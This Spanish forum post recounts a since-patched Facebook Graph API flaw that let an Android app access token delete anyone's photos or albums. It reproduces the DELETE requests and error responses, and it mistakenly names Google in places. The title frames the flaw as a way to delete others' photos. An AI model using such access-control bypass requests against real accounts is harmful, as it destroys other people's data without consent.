Estamos migrando de sistemas de foros, por favor repórtanos cualquier problema a [email protected], si te llega a tu bandeja de entrada o a spam un correo que te dice que se solicitó el cambio de contraseña, no te alarmes, es un procedimiento normal de la migración, cambia tu contraseña porque no hay compatibilidad en el sistema de cifrado del viejo sistema con el sistema nuevo, por eso debes resetear tu clave con ese enlace.

¿Como borrar cualquier foto o álbum de Facebook aunque no sea tuya?

editado febrero 2015 en Noticias
En algún momento nos hemos hecho la pregunta ¿Como borrar cualquier foto o álbum de Facebook aunque no sea mía?, seguramente después de una noche alocada de fiestas donde algún amigo tomo fotos que no debía tomar y luego las subió a Facebook no sin antes etiquetarte, o esa foto en la que sales con alguien, esa persona sale reluciente y tu sales en tu peor momento.

Cuando era niño soñaba con poder volar o tener visión nocturna, e incluso ser invisible, pero al parecer, poder borrar cualquier foto de Facebook a su antojo es el nuevo super poder que todos desean tener... y es lo que consiguió realizar el investigador Laxman Muthiyah, quien logró descubrir no solo como eliminar fotos de cualquier persona en Facebook [incluso las de zuckerberg] sino que tenia el poder de borrar TODAS LAS FOTOS DE LA RED SOCIAL

¿Cómo lo hizo?

Laxman inicio investigando la api de google, especialmente el apartado que permitia eliminar

graph%2Bapi.JPG

Luego hizo lo que cualquiera de nosotros, intento borrar una de sus fotos con el access token de grapa y la siguiente petición

[HIDE]
DELETE /518171421550249 HTTP/1.1
	Host :  graph.facebook.com
	Content-Length: 245
	access_token=CAACEdEose0cBAABAXPPuULhNCsYZA2cgSbaj  NEV99ZCHXoNPvp6LqgHmTNYvuNt3e5DD4wZA1eAMflPMCAGKVl  aDbJQXPZAWqd3vkaAy9VvQnxyECVD0DYOpWm3we0X3lp6ZB0hl  aSDSkbcilmKYLAzQ6ql1ChyViTiSH1ZBvrjZAH3RQoova87KKs  GJT3adTVZBaDSIZAYxRzCNtAC0SZCMzKAyCfXXy4RMUZD
	
[/HIDE]

consiguiendo como resultado
[HIDE]{"error":{"message":"(#200) Application does not have the capability to make this API call.","type":"OAuthException","code":200}}
[/HIDE]

Después intento con el access token de la api movil, ya que veía que en movil siempre salía la opción de borrar, hizo la petición:

[HIDE]
DELETE /518171421550249 HTTP/1.1
	Host :  graph.facebook.com
	Content-Length: 245
	access_token=<Facebook_for_Android_Access_Token>
[/HIDE]

Y consiguió un resultado positivo, luego intentó con un álbum de otra persona


[HIDE]
DELETE /518171421550249 HTTP/1.1
	Host :  graph.facebook.com
	Content-Length: 245
	access_token=<Facebook_for_Android_Access_Token>
[/HIDE]

También con resultados positivos, su siguiente paso fue grabar este video como prueba de concepto y enviarlo al equipo de seguridad de google [no sin antes seguramente borrar algunas fotos que le incomodaran seguramente]

[HIDE][video]
Consiguiendo una rapida respuesta
first%2Back.JPG

[h=4]Un premio por $12500 USD por reportar la vulnerabilidad.[/h]
second%2Back.JPG

Y que en menos de 2 horas el problema estuviera resuelto

error.JPG

La seguridad no existe a un 100%, si te dedicas a explorar a fondo cualquier sistema, seguro que encuentras un fallo que no fue tenido en cuenta por los desarrolladores y eso quería compartir con todos en esta grandiosa comunidad.

Comentarios

Accede o Regístrate para comentar.